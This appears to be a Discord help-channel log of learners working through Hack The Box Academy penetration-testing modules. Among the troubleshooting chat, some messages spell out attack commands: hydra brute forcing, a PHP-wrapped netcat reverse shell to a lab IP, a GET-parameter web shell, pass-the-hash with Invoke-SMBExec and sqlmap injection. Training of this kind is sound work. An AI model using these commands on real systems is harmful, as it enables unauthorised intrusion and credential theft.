#modules

im a noob at coding lol

what do I do here?

hack

with what

Got it :)! The issue I was facing was the HTB academy not elaborating which command is ran where so I was trying to forward remote ports on wrong server 😦 But thanks for the help. Scanning is still a pain in the but, I'm not sure what a good scanning strategy is

anything

ok

Keep coding, I would recommend youtubing some stuff before here

I use online gdb rn

Oh sheet you're next level

on school chromebook and linux is blocked

chromebooks use linux kernel

bro I said I dont know how to code that much

https://academy.hackthebox.com/

I should have an affiliate link

ok

lemme dm myself and then ill gmail myself the same thing

ok

now ill just gmail myself later

is there a way I could invite the @compact patrol bot into my server?

They open sourced it. Check #📣-announcements

I know like how do you do it without code

im on 5min

50min*

right now 👀

lol

i used|| hydra -L username.list -P password.list ftp://ip ||

Hello, I'm currently on the "ATTACKING COMMON SERVICES - Attacking FTP" module an there is a question "What port is the FTP service running on?". When I run nmap there is no FTP server running on the machine. I'm missing something?

22 is ssh

If you don't see an FTP service running, then reset the target

if i recall, either you must reset the machine and/or check all ports

I know. ssh can run sftp so I tried it as the answer.

I restarted the machine and I have the same result. A already checked all port with -p- option.

Reset the machine again

Give it a few minutes and try, if that doesn't work => reset

you need to do a service scan

Nmap checks a text file to determine which ports are usually running on these ports

and displays them

With a service/version scan, Nmap sends various requests to determine the service

so you could do this:

nmap -p22,53,139,445 -sV 10.129.203.6 

but maybe something is wrong with the machine too, it seems weird that it would try to "trick" you like that in a learning module but idk 😄

I haven't done the module

i reviewed my notes for this one, this one is a reset and check all ports issue. a bit annoying.

I had the same issue yesterday and I restarted the machine several times. Here is the result from the service/version scan.

ohh okay then yeah seems to be something wrong with the machine then

What now? I should write to the support? Or the support is periodically checking discord?

ask @cunning prairie 😄

this ^

you may have to reset several more times. the answer is not always a default port.

Thank you guys. I restarted the machine several times and now it works. ❤️

just pay it forward. 😀

can someone help me with this? i've been told this is the right thing im doing

but i waited for it to go to the end and nothing got cracked...

its password attacks easy lab

Command looks good. You might want to use -t to speed up the process.
If you ran through everything without success, redownload the lists and try again. Also make sure you don't have any connection issues

what -t value should i use?

I used 64. That's a bit brutal but seemed to work

@naive field said they waited until the end and nothing got cracked so I don't see any reason to use -t

to speed things up

Are you sre the username is correct @naive field ?

im trying it just to make sure

i put the usernme list

let me see the command

.

this one

so you waited until the command finished?

and no credentials were found?

well it seems the credentials are not in that wordlist 😄

neither user and password?

where did you get that wordlist?

did the module say to use it?

i got it from resources

its a lab

so there is no instructions

what resources

provided in the module

ohh

hmm

so strange 😄

idk

🤷‍♂️

i swear every section i need to f-up something

especially this pw attack module

i mean the command you're using is definitely correct

and if it gave you that those wordlists.. then i would definitely expect the credentials to be there

perhaps it's something wrong with the machine ?

i did it earlier today

and nothing

idk maybe reach out to support, it seems like it's a problem with the machine

Lists should be alright. The number of attempts matches my notes

if they gave you the wordlist, then it should be in there

i have no idea...

That'd be my guess too at this point

I'll rerun the command and see if I run into similar issues. Maybe I can figure out what's wrong here

that'd be great if u have some spare time

Command is running. We'll see

anything cracked?

Mine is running at not even half your speed so it's not done yet 😄

oh gotchya, mb

i realised mine is the slowest since its on pwnbox :D

Would be interesting to know why yours is that much faster though. I have no clue

Ah okay pwnbox being faster than VPN does make sense

Yep. It cracked it

huh

:/

ig im just an unlucky person haha

It says that 62 threads didn't complete. There's a chance one of them is the one you're looking for

Not the problem here

it's always like that idk how to fix it

In general, yes, but I've been doing the exact same thing without issues.

even when i dont use -t for more stability same sh*t

I didn't run into that issue yet so dunno how to fix it. Maybe google has some quick fixed to offer?

i did

almost nothing tbh

Hi guys i am doing the module shells and payloads but i am stuck on this question. I found that i have to use the 50064.rb exploit with msfconsole but when i run the exploit i receive an error

This error

The settings that i used are these :

from i can get a good wifi adapter

you're on the right track. take another look at the vhost. vhosts should be in a different format (check /etc/hosts if you don't know what I mean)

Set vhost now : blog.inlanefreight.local but same error

I Change the targeturi in / and after the run command i have some new errors now.. something is moving

May be wrong payload set in msfconsole?

hii

i am new

this channel is for help w/ HTB modules, you would be better off giving introductions in #general 😛

pretty sure I didn't touch the payload. so if that's default it should be fine

i am good

but not very good

did u just use use 50064.rb

?

Anyone finished the Footprinting module DNS section? I need to understand a couple of things that I don't believe I understood properly. Please let me know so I can dm

Depending on what the questions are I might be able to help. You can dm me

.

great thanks man ... give me like 10 min to dm you

Hi all, I am having little technical issue in connecting to the target machine machine over ssh. I can ping the target machine but i cannot ssh it. I see 22 is open but i dont get the connection . However when i try to ssh same target from pwnbox i get the yes/no question for connection and get log in to target. can some one assist what could b wrong?

Are you connect to pwnbox and vpn?

Which module and section?

Yep !

i saw pwnbox and vpn has same ip addresses so i terminated it. but still not working.

getting same error again and again after some time.

From which module and section is the target that you've spawned

I can ping though.

Maybe try restarting the target and only have EITHER pwnbox or VPN on

Reset the target. and did the ssh again same error received.

pwnbox is already disconnected a while ago.

Did you use the new IP? Because it looks like you used the old one

target happen to spwan with same ip again and again.

Try refreshing the webpage

see the ping drops and reappearance

And see if the IP changes

let me do this now.

did this 4 times . same IP everytime. One more thing this problem came in from 2 days back when i tried to connect to the htb season labs vpn and disconnected it. I also tried downloading the new version of openvpn config file 3 times but same issue.

Mhh. Only thing I can think of now is contacting support

Got this. Shall I email them?

or is there any active chat around here?

Active chat

Button right

Bottom

yes still searching 🙂

@sick mural

is there anyway to read a file with smbclient?

Yes

https://academy.hackthebox.com/module/176/section/1780

Get-GPPpassword.ps1 didn't fetch anything

Thanks for assistance. Working to get support guy online.

Weird

Anyone faced this issue in windows attacks and defense module?

Hi, i am doing the module Windows Attacks & Defense. I just did the first Kerberoasting Attack, and now I need to get the ServiceSid of the user webservice. I think i did found it but the answer is wrong. Can someone help me plz ?

This is the correct one

I've recently done it, few mins ago

for the cracking passwords with hashcat module the Cracking Wireless (WPA/WPA2) Handshakes with Hashcat, Is the hash not loading supposed to be part of it? I copied everything verbatim from the examples and when i go to run my .hccapx through hashcat it says no hash loaded. But it seems like it converted fine when i did my ./cap2hccapx.bin corp_capture1-01.cap mic_to_crack.hccapx.

Hi, ok thx, but tha app says it's wrong. The hint says i need to check both general and details, but i didn't find any releveant informations in general

That data can be fetched from details tab only, that you've already done

Please copy paste it, and check whitespaces

Clever X). yeah there was a space at the beginning

Thx

Indeed

MrR3boot

Hello there i think something wrong with connecting to academy ovpn

Why, it looks normal to me

Yea that is what mine always looks like ^^^

Why is is that the active subdomain enumeration section of the information gathering module gives me a command that is not working?

the "nslookup -type=NS zonetransfer.me" keeps giving me this:

Server: 192.168.189.2
Address: 192.168.189.2#53

** server can't find inlanefreight.htb: NXDOMAIN

You are querying the nameserver of zonetransfer.me but error message says inlanefreight.htb can't be found?
Something is not right at all.
Please make a printscreen

My bad, the query is for "inlanefreight.htb"

I just copied the command from the module

Idk why it won't let me add a screenshot rn

I don't know why i can't render the module IP in browser but when i curl it its fine !!

Are you verified? #welcome

htb is not an official TLD. This means that the root nameservers cannot resolve this TLD.
So you have to specify a nameserver in your request, which has the corresponding zonefile.

dig NS inlanefreight.htb @NameServerIP(Target from Module)
nslookup -type=NS inlanefreight.htb NameServerIP(Target from Module)

Thats it, thank you!

Hey guys, I'm stuck at module footprinting - DNS. the 4th exercise just make me die!! Tried almost all wordlists from seclist. I can't figure out what I'm doing wrong. Any advise?

Host 203? You need to find all zones

And a fierce hostlist

Dnsenum can be run on subdomains of subdomains

Hi, i'm doing the Login Brute Forcing with Hydra,
on skill assesment: Website second question:

Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?

anyone has an hint for solve?

i have tried
hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 206.189.124.101 -s 32341 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='log-in'"

have you checked the source code to see what is used in the form?

yes bro , can i dm you ?

sure

For some reason I am finding this section impossible(Active subdomain enumeration), can I dm someone to clarify and ask a question?

Sure

getting this error while importing the private key in attacking a uthentication mechanisms:

nvm got it

I can curl webserver and ping IP but can't see it on the web browser
so i was on the internet investigating and found this, could anyone help me

Hi, 👋 I'm new here. Hope to learn lots.

Welcome @livid steeple

This isn't the place for introductions

This is for asking questions related to the modules found at https://academy.hackthebox.com

Module shells and payload : after run the 50064.rb exploit i receivw this error.. i am going crazy.

It's always nice to say hello 😁 Thank you for letting me know. I have questions regarding the machines, I hope this is the right place to ask.

if it's regarding the starting-point machines or boxes on the main app.hackthebox.com site, please follow instructions in #welcome

Mild change is that it's /verify not ++

AD enum & attacks, Misc missconfiguration, how do i ssh in via powershell? i tried ssh htb-student@ip, it asked me for a password, i entered the password provided by the module in the beginning when it says i might need to ssh and explains how too but it keeps rejecting the password, i tried reseting the lab multiple times

I am struggling to find the txt record, in the information gathering web edition - active subdomain enumeration section

I am trying everything in the module, but I beleive I am missing something important

the module is really unhelpful here, the Footprinting module has a DNS section, try the stuff shown there. tell me if u want me to point u to a direction

Ok, thanks Ill look at that now

Just solved the remainging 4 questions instantly lol

that was so easy with the notes I took from the footprinting module

thanks

any time man

hey guys
when i want create a virtualenv with python2 to use tplmap tool i get an error (im in server-side module )
anybody is here to help me?

Is this related to an academy module?

yes

can u help me?

what is the error

solved
tnx

any1 do the osint module ?

Hint: Inspect

Or use: *** is the leading solution to find and verify professional email addresses

it is easier than you think, don't overcomplicate it

oh lmfao

ok but i wonder why intext:"@inlanefreight.com" didn't pick that up

with "jeremy"

has anyone thats done the server side attacks assesmtn available for assistance?

try this one

https://tenor.com/view/falafel-gifalafel-hazfalafel-icanhasfalafel-reaction-gif-reaction-פלאפלאנילקבליכולפלאפל-פלאפל-אנילקבליכולפלאפל-digging-gif-13411844

hope u get it xd

i don't but i solved it so it is what it is

lmfao

not a bad module
i woulda liked to see a linkedin page and some fake employees to track down
that woulda been a bit more interesting
ex-employees
some waybackmachine maybe
but overwall it was neat

if i finish a module and it is later updated, do i need to purchase it to do the new content, or will i have access to it?

someone can help me in the module: attacking common services - Section: sql databases

If you bought a module, it is yours and you get updates for free

same if I got it through business?

i have enumerated all the dabatase and logged in as well in the other ports and i couldnt find nothing

no idea

hm dang

@autumn pilot do you know if this is the same for business account users?

can't recall, sry

np

Do you have the correct user? ***svc

i didnt find the password/hash

am using mssqlclient

||Responder|| is your friend

Can someone please help me 😭

For all requests that start like this, the answer is usually no
What is the issue?

I may be overlooking something in the virtual hosts section of information gathering web edition, but what is "./vhosts" referring to?

Someone took my Instagram and Snapchat account

lol this isnt the place for that

Contact Instagram and Snapchat support

How

you can google instagram or snapchat and after it put "support"

This?
cat ./vhosts

in this case vhosts is a file

yes

i think i have it now, is this where the path to my wordlist goes?

Is there a place I can put feedback for something to add to a module ?

For the serverside assessment, i found the attack surface and am able to read files. i was able to read the /etc/passwd and /etc/shadow files but i cant seem to find the flag.txt. i have a feeling they changed the name of it for this assessment but i cant seem to find it. any hints?

erratum would be a start

Ok, I got it now. I thought the ./ was calling a script or sm that I wasn't seeing

Yes

Hello, everyone.
I am stuck "Password Attacks Lab - Hard"...
I cracked B**.v**'s password.
Could you please DM ok?

In the context of using files, ./ Indicates to most programs that you want to use the current directory

I'm currently working on this module: https://academy.hackthebox.com/module/112/section/1067
I'm on one of the questions and I know I have to use rpcclient for it but, I'm unable to do?

I've tried switching the VPNs and on PwnBox but I'm still not able to interact with the RPC

Am I performing something wrong or it's a platform issue?

Is that the IP the spawn target gave you?

Yup

Also please just say module and section name

SMB

Footprinting?

Footprinting - SMB

Yup

Kk you've done the other parts up to this point yes?

The other parts, you mean in this particular section right?

SMB

Then yes

The ones before were FTP and the ones before that is Footprinting/OSINT stuff

Can you ping the address?

^

Yup

is the 445 port open?

In fact I'm able to enumerate shares on it too, which is related to the same section

weird

then

try resetting the target

I see the RPC port open on 111 but

and connecting again

Maybe try adding the -N option before the ip for no-pass

give it a moment

-N doesn't matter for the -U "" option

because you're telling RPC that you're connecting with a null session

It just won't prompt you for a password

I've tried resetting too. But giving it a moment- I haven't done that

Let me do that

@misty current do you have a space between your quotes?

hard to tell sometimes in cmd line

Oh I don't think I added a space

Nope didn't add it, just confirmed

cool but yeah try giving it like a minute after spawn

Sure

I was able to connect to it just fine :)

Also the issue wasn't that it was a password issue, it was a windows related error saying the service doesn't exist

Hey! Anyone interested in helping a noob?
I have just started from zero and and unlocked the module: Windows fundamentals, and already stuck in the first question *( "What is the Build Number of the target workstation?" I am supposed to use the instance provided by HTB, but when I write the given code, it doesn't work! what am I doing wrong?

Ah, how did you workaround that?

Were you able to connect?

You don't need a password

I didn't get any prompts for passwords tho

I know, I was just exploring options they could try

did you specify any ports? @fathom pendant

No

Try using a different VPN connection

Or switch from tcp to UDP or vice versa

https://www.winhelponline.com/blog/find-windows-10-build-version-edition-bit/

let me try TCP

The switch to TCP for VPN didn't work either

Try changing VPN region the

Then* this will require a lab reset

which region do you have yours set to?

Us academy 1

@fathom pendant I am using the interactive instance, not my windows. this is what it looks like:

You can't post screenshot

You need to verify your app.hackthebox.com account via instructions in #welcome

There is a spawn target button yes? And it gives you credentials to how to rdp in?

Yes, there is

Click the button if you haven't spawned the target

It should give you an IP

Did that

Ok so what are you having trouble with exactly

Using rdp to connect to the IP?

Because the interactive pwnbox is NOT the target

No luck with the region switch either.

Interesting

I supposed I'll have to try this module some other day

And you reset target after switching regions (make sure you redownload the VPN config, end the current openvpn and start a new one)

For Windows Priv Esc Assessment II is this normal behavior after I complete the exploit. I have the last flag from using the meterpretershell, but can't keep it stable enough to get the second.

meterpreter > net user administrator password
[-] Unknown command: net
meterpreter > shell
Process 836 created.
Channel 1 created.
Microsoft Windows [Version 10.0.18363.592]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>net user administrator password

Terminate channel 1? [y/N]  y
[-] Error running command shell: Rex::TimeoutError Send timed out
meterpreter > shell
[-] Error running command shell: Rex::TimeoutError Send timed out
meterpreter > 

I'm making sure to download a new VPN everytime lol

Lol you don't need a new VPN every time

I've been pushed to resort to this xD

¯_(ツ)_/¯

This is the code to connect to target: xfreerdp /v:<10.129.68.64> /u:htb-student /p:Academy_WinFun!
I get an Eror when I type this in the Parrot terminal

I'd contact support on the site then since it looks like a weird issue

Put the password in single quotes

same error

Yup, I'll definitely raise this to support team if it's still the same when I try it after 2 days. It's working for you so.. I'll try another time in a day

I'll have to skip this for now.

Thanks anyways @fathom pendant

someone know how to log in with a hash in mssql?

Oh I see the issue now, take out the left/right brackets

you have to crack the hash

i got it

but i cannot log in with the password

and i have readen in the forum that i need to log in with the hash

Wow it worked, now how do I find the Build number from the target workstation?

You can login like this
|| $sqsh -S 10.129.103.4 -U WIN-02\mssqlsvc -P 'yourpasswordhere' -h||

why i couldnt get it with mssqlclient.py

I linked an article earlier

finally finished with pw attacks

hell on earth

xd

can someone please help... this is for the session hijacking module.. not sure on what part im supposed to put the actual IP in the index.php file for thos. "Victim IP: {$_SERVER['REMOTE_ADDR']}

https://academy.hackthebox.com/module/176/section/1783

3rd question in this module

windows attacks and defense, the problem is that, after attempting to log into DC1 with the said credentials, and checking in the Event Viewer in DC1, there's no activity registered on the username bonni

Module name and question?

so I tried to log into it multiple times, as it was supposed to fail,

That's the new one yea?

indeed, been a while, maybe a week or so

I checked each one of Event ID 4771, manually, none of them had bonni username

Is that the eid it's looking for?

yup, the hint suggested it + even without the EID, looking for just the username bonni doesn't yield a thing

183,402 EIDs logged, no less

and I have switched back and forth 3 times ig, no changes

logging off now

Gotcha interesting if I ever run this

Figure it out?

anyone finish this question from PrintSpooler & NTLM Relaying? Windows Attacks and Defense, IU keep getting this error when running dementor

In the Attacking Common Applications module did anyone else have trouble getting the Metasploit modules to work on the Jenkins and Tomcat targets? I've tried the suggested exploits and I just get the "Exploit completed but no session was created" result.

a pretty common problem

Ok, I know they're kind of fiddly/unstable. I'll just go on. Thanks!

i need some help the dns section of the footprinting module

i know what subdomain to brute force

but every time i try brute force the query times out

this is for the What is the FQDN of the host where the last octet ends with "x.x.x.203"? btw

what are your commands?

dnsenum --dnsserver 10.129.236.33 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt --threads 90 dev1.inlanefreight.htb

is this dev ip in your /etc/hosts

wdym

So we are not allowed at all to ask for help on active machines? like MonitorsTwo. Is it just waiting for a walkthrough to comeout my best option?

you are not allowed to ask anything about any machines 😄

this is for academy modules only

ok. thanks

no

There's a channel for monitorstwo

I am guessing if it is time out your machine doesnt know where to look

And a forum post.

ive been reading the forum post

no help

ive managed to get a response but the subdomain doesnt have the x.x.x.203

if you already knew the subdomain you wouldnt have had to look it up

so youre very likely fundementally misunderstanding the question

is the subdomain not dev.inlanefreight.htb?

if it is then you ought to have the FQDN already

im so lost

whats a FQDN

cuz i cant do dig axfr on that

It doesn't need to be in etc hosts

For dnsenum

fully qualified domain name

Dnsenum brutes it

the return dns

cool so whats the format of a FQDN

Also I don't think dev1 is a subdomain

For that question

yeah it was dev

And section

i pasted the wrong input

www.subdomain?

no

re read the section information again

will do

A.b.tld

Where tld is the top level domain (example.com

did i atleast get the subdomain right

maybe

you tell me

😂

this is torture

That spoils it if we just tell you :) but the answer will be in the form of a.b.inlanefreight.htb

ok thanks for the help

it's not so difficult just read the material

So it's not digging too hard into it

its 2 in the morning for me man

running on no sleep

go to bed do it later

big brain time

just feel like im too close to stop

its addicting

If you're struggling then best advice is to walk away and come back later

You shouldn't generally be struggling super hard as you've got the info almost all correct. But definitely double check all of the more fierce hostlists in the seclist directory

I know this is old but I think I know why your can't access Admins stuff and what you need to do in order to achieve that. If you wanna chat about it, hit me up.

Dude that was like a month ago. If they haven't solved it by now they have bigger problems lol

I know lol but I was trying to figure out why and figured it out myself. Now I must share the glory.

Lol yeah responding to messages 1+ month ago most people are gonna be confused

im tryn

In general, if it's 1+ week it's almost never worth replying lol

tell me how, a similar thing happened to me today 🙂

I added a user to admin group then created another user and added it to the admin group. Both didnt work at all. they were in the admin group alright but couldnt access to admin desktop.

disconnecting and restarting didnt work neither

Yeah I had figured it out

Windows attacks and defense needs some attention

😮‍💨

guys im doing linux fundamentals I need some help lol

Hello guys in the section RDP and SOCKS Tunneling with SocksOverRDP I'm trying to load SocksOverRDP.dll but Windows says operation not permitted, I already checked the antivirus and firewall but all is turned on, how should I do ?

disable defender

windows defender firewall ? already off

make sure also that you are using an elevated prompt

yes I do

More information required

Hello world, I'm on Documentation & Reporting module and Documentation & Reporting Practice Lab, I don't find command injection where is for report. Need a hint, thanks

im trying to find what the path is the htb students mail

Msg the exact question and what you've tried already

the question is "what is the path to the htb-students mail"

im on kali linux

seems like defender is still on

as the dll is being flagged

that's rlly strange

and ive connected into the sshso im in the machine

not defender firewall, but windows defender

the AV

Module: Pivoting

Section: Skill Assessment

Question: 5th "In previous pentests against Inlanefreight, we have seen that they have a bad habit of utilizing accounts with services in a way that exposes the users credentials and the network as a whole. What user is vulnerable?"

Hint: We may be able to find something stored in LSASS.

I have been in this question for days after getting the RDP of m*** user. Any help or hints to move forward would be appreciated

this ?

https://support.microsoft.com/en-us/windows/turn-off-defender-antivirus-protection-in-windows-security-99e6004f-c54c-8509-773c-a4d776b77960

works thanks you

ok btw i got all the questions right on HTB

im going to bed lol

this section is really horrible with RDP sessions in RDP sessions with file transfers bruh

What is the method to download from Sysinternals? I can't access the internet from the spawned windows session.

Download it to your host with the VPN

and transfer it

okey okey

hello

i need one help

can we get ip address through phone number or any social media account?

i have tried soo many ways but it was useless

if someone can help

Why

Also this is not the right channel for such a question, move to #general

its showing no access

Idk maybe you were banned ask the mods

but i havent done anything

Ask mods

can you pls call the mods

hello any mod there?

Who can I pm regarding the following module: https://academy.hackthebox.com/module/113/section/2164?

are you mod sir?

No

ok

Hello, do you have any luck with these? I have the same issue. Thank you.

Hey guys,

am stuck at SMB enumeration

the question is simple and IDK what am not getting

What is the full system path of that specific share?

do you have a command prompt on the machine

okay,

it's a question 😄

can you execute commands on the machine?

Hi trying to figure out how to find he admin email in the Footprinting module imap/pop3 section. I logged in as it said in the section, but I can't find anyway to find what users the service have... the ID command just gives the same results no matter what I wass, and the list "" * just give me directories... I went over the section again and again trying to find how to do it. but I didn't.

am using VM, so i can

am on linux

What command are you using to list the shares?

am using rpcclient to list the shares netshareenumall

i can see the path, but the answer is wrong

it is expecting a linux path

what is the path?

C:\home\sambauser\

Does a windows machine have a C:\home\ ?

😉

noo xD

I know it is linux

BUTTT

My question is that why would rpcclient reveal a wrong path?

?

Welp, have you ever used WSL?

what do you mean 😄

Am not sure what i mean xD

But umm i tried entering /home/sambauser/

as an answer, it didnt take it

have you tried entering the path that is shown in the output of netshareenumall?

yupp thats what netshareenumall shows C:\home\sambauser\

hi, can anyone help me for this question? What is the FQDN of the host where the last octet ends with "x.x.x.203"?

paste the full output

try to do nslookup with that ip

what ip? i dont know that ip yet

netname: sambashare
remark: InFreight SMB v3.1
path: C:\home\sambauser
password:

Guys what is the benefits in VIP+ subscription

Because I plan to do some Course in some Institute and also I have plan to get VIP+ in htb to learn hacking so I am confused to do because I am poor in money..
Guys any one have idea pls guide me ...

Which will be great decision?

I tried to login to the share sambashare , just got the flag but no clue about the path

You have to find all zones

btw I still have no thread how to find the admin email 😦

i found 2 zone, inlane and internal.inlane

but got stuck with this

nvm

and both do not include the host you are looking for. Means there is one more zone

did u try /home/sambauser/

i understand, and getting stuck with that 😄

:))

yup i did

include ip?

Remember that not all servers allow zonetransfer from everyone

How do you know it's talking about the sambashare share?

so any recommend to do with that?

from the previous question*

hmmm

the previous question mentioned that it is talking about samba

Guys what is the benefits in VIP+ subscription

Because I plan to do some Course in some Institute and also I have plan to get VIP+ in htb to learn hacking so I am confused to do because I am poor in money..
Guys any one have idea pls guide me ...

Which will be great decision?

did you try /home/sambauser without the / at the end

dayummm bro

hahahaha

omGG

that worked?

yeah xD

lmfao

ez

hahahaha

can i like give you some 10 star rating xD

I solve the issue. I made a payload with msfvenom and uploaded and then got a rev shell. Thank anyway.

you should take one, bc you will have a virtual machine for learning, or via vpn

Lol

Hello?

thanks buddy!

@vocal coral OK then I don't want to go for any institute right

you're logged into a POP3 server?

I can... but I don't think there is a way to list emails there?

you will need cube to pay for course, so if i dont take vip+, you will not have cube

sr, can i DM you?

hi, im doing the windows privilege escalation module and im stuck at a part where i need to do uacbypass to get elevated shell, tried a couple of techniques and it didnt worked, can someone pm me?

sure

hi guys i am having trouble with this:
windows priv escalation:
Using the techniques in this section obtain the cleartext credentials for the SCCM_SVC user.

basically i am putting the malicious file in the shared folder in c:\ but sccm_scv user wont access the folder so i am stck

still stuggling with this... i am only able to get htb-student hash and not user SCCM_SCV ..

what if you type LIST

0 messages

wat

da hayul

so strange 😄

spoiler

@vocal coral yes I know that but am asking that HTB or offline institute will be right place to learn from 0 to pro?

what if u do STAT

wtf lol

so it says you're supposed to get the admin email from the POP3 server?

The Academy is certainly a good start to learn hacking

or the imap one

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

it must be in the imap one then

cuz it seems like the POP3 is empty

I gtg be right in like 1h

@acoustic owl okay 😊

shoping for the weekend

swag

It's going to be on IMAP not pop3

Also https://www.atmail.com/blog/imap-101-manual-imap-sessions/
https://www.atmail.com/blog/imap-commands/

Really helpful links

Hey! need some tips. module "getting started" - Knowledge check. i'm able to print the id with "<?php system ('id'); ?> when i set up a nc listener and run <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?> nothing happens, tried a couple of other shells with same result. any tips?

I usually do <?php echo system($_GET['cmd']);?>

and then use the Python3 #2 reverse shell from https://www.revshells.com/

and then visit http://<ip>/<page>.php?cmd=<revshell command>

I'll try, thanks

Hi, In File transfers->Miscellaneous File Transfer Methods . one has to practice transfering files via nc from attack > to victim. but victim machine (windows machine) dont have nc installed on it. also if you try to download , it tips the AV which deletes the executable file. Any idea how to use nc on windows box?

Hello can someone help me in this question:

Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)
This question is in public exploits
What are the steps to do it?!

Well first you visit the IP:port it gives you
Second you use the msfconsole or searchsploit as suggested to exploit the vulnerability of the specific plugin

I did them but i cannot reach the flag.txt

Well in the exploit you should be able to change the filepath

Which one of the exploits should i use there is a big list of exploits for wordpress

Well you're looking up the wrong thing then

Hint: it's the plugin being used

They're even nice enough to tell you the version it's running

I searched for this one and it did not work

I found an exploit for wordpress plugin 2.7.10 but it also did not work

It does not give me what i need

One moment

same issue, id, pwn etc works fine, but cmd='revshell' don't wanna give me any juice

It should be the file_read exploit if you search for <plugin name> 2.7.10

(note file_read is only part of the full msfconsole exploit name you use)

try base64 encoded ones

Guys what is personal instance in server

hi guys I am in the SQL Injection Skills Assessment. 'Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.' Can someone give me a hint on how can i approach this?

first try to identify an valid injection point @urban anvil

thank you for the hint

Personal instance means that it's yours, no one else can touch it

Just apply what you have learned during the module 😁

how do I get nessus working during the skills assessment in the pwnbox? It giving me an error when I try to start it.

What error? Also the skill assessment uses a jumpbox iirc so you don't have to wait for results

sup

still need help?

when I try to navigate to it in firefox it is not showing up as valid, and if I try to connect via rdp it also does not allow me to connect

what is the output of sudo iptables -L and sudo ufw status ?

on your local host

Okay thank you!

So it doesn't allow you to rdp to the spawned 10.x.x.x or navigate to the IP:8834?

nope

What is your rdp command?

it says the connection has timed out

on firefox

xfreerdp /u:htb-student /p:'HTB_@cademy_student!' /v:10.129.201.248

what does ping 10.129.201.248 show

it seems like that host is down

its slow but it is responding

the module says you're supposed to RDP into the box?

ah finally it worked

lets go

hacker moment

no but I saw that in the discord that some people had to do that

lol

It's recommended because manually running the scans can take a good hour

Idk regarding pwnbox if it's running by default

PTH module guys, i dont get the rev shell at all. i am running nc as admin and runign rev from Julios powershell.exe prompt. please, any hint? i have tryied different ports

you don't need to run nc as sudo if that's what you mean by admin

yeah, i just "run as administrator"

windows has netcat?

yes

on the lab

oh

what is the command you're using to run the netcat listener 😄

hi all , i am currently working an the module "attacking common services" i am stuck with an issue on the questions about the ftp service . What port is the FTP service running on? . but when i scan the ip there is no ftp service running. there are other services though. someone had the same issue ?

nc.exe -lnvp

no port?

nc.exe -lnvp 443

what what's the command you're using for the rev shell

I didn't think you needed to rev shell with the pth section

But it's been a bit

Still stuck at this so bringing it up once again

yeah, i have tried both. on admin powershell and on pth shell. none of them work. this lab must be broken

invoke-smbexec

Which creds do you have?

who should i report this lab/ it is broken for sure

And you're running the invoke from the tools directory? iirc you need to be in that directory and import that module but I could be mistaken

What module is this?

i am doing things right. yes, i am importin-module invoke-smbexec....

the commanda as being executed ,but no reverse shell at all

import-module*

Interesting and you're following the examples (changing IP where appropriate

Also by module I meant academy module

yeah, thats my invoke-smbexec command: Invoke-SMBExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b -Command " powershell -e Base6shellcode"

I had some trouble with this the other day, which prompt on revshell are you using?

powershell

base64

Are you using powershell #3 and selecting Base64 from the drop down menu or the one titled powershell #3 (base 64)?

powershell #3 (base 64

That’s the one that worked for me, did you try wmiexec?

yeah i tried both

i will try the one that worked for you. it might be somethign with the base64

one sec

Yeah I’d try a few more of the shell commands, make sure the module is importing correctly as well, it’s almost always something dumb being overlooked

At least for me

what port did you use?

I used 9000 something

didnt work.

i have tried all possibilities. there is something wrong with the lab

Dm me some screenshots of your terminal?

sure

done

Hi there, I need some help/assistance on the bypassing Web Application Protections - case 9 and case 11?
I tried the following but it didn't work. I think I understand something wrong.
case 9,
sqlmap -u “http://206.189.114.209:30142/case9.php?id=1*&uid=1842984375” --randomize=uid --batch -v 5 --tables --dump | grep URI

case 11, I tried a bunch of others, all of them doesnt seem to work.
sqlmap -u “http://165.227.225.180:32243/case11.php” --data=‘id=1’ --tamper=apostrophemask,greater --batch --tables

Thank you…

It looks like you're missing a closing double quotes

I am stuck with the command injection chapter > Use what you learned in this section find the content of flag.txt in the home folder of the user you previously found, I think I'm almost there but can I share through dm the command what I'm doing? appreciate your help

start with a simple command, and then build on top of it

I am working through a test via HTB and the vms can only handle 1 request at a time before the VM fails and needs to be restarted. Is there a fix for this?

Elaborate what you're referring to "test"

It's an onboarding test.

Which is fine, but I feel like something is misconfigured because I have reset the vm after each request

That doesn't help us figure out what you're talking about

You may need to reach out to support on the site

https://help.hackthebox.com/ make sure you have Adblock disabled

thanks!

Is it related to an academy module?

I'm not sure exactly. HTB hosts their onboarding technical tests.

they call it a "lab assessment"

Hey has anyone recently completed "Attacking Common Service" SMB section? Think I mightve missed something as far as password attacking the service for one of the users

<@&861185840277487616> ? Is this allowed

What's the issue you're having? (Iirc this one you can follow the examples pretty closely)

Also this lab does have a user and PW list to download

Well the module itself

Is the answer not in the section?

The footprinting section tells you it'll be on an IMAP server

:)

I also provided links below that to some useful IMAP commands to grab and read the email

Because if you don't do a specific one (or ones) all you'll get is "nil" in a bunch of places

Thanks again!

I redid this module challenging myself to only use CMD line and not a GUI client

I figured it will be on the imap because pop3 can only send recive and delete... very little querying available(beside list and stat maybe..)

Sometimes pop3 may have something

Well yea. still... What is the logical follow though from the section to solve the question?

Sign in with the given credentials on IMAP

yeah I downloaded the pw list from a previous section, but cme didnt pop for the user in question with that pw list

Use IMAP enumeration

I have

Iirc this hash can actually be cracked with rockyou if you're on that portion

wdym?

Use IMAP commands to find the answer from the footprinting IMAP/pop3 section :)

They gave you some starter commands

But the one that they give you for reading an email isn't quite correct

I am 😦

I can't seem to find the user

? You're given the username/password to login with

yes

I have logged in

but that isn't the answer... I assume I need to find a diff email

so... it will be something like poor_admin@inlanefreight.htb

Oh wait.. I see the select command

lemme fizzle with it

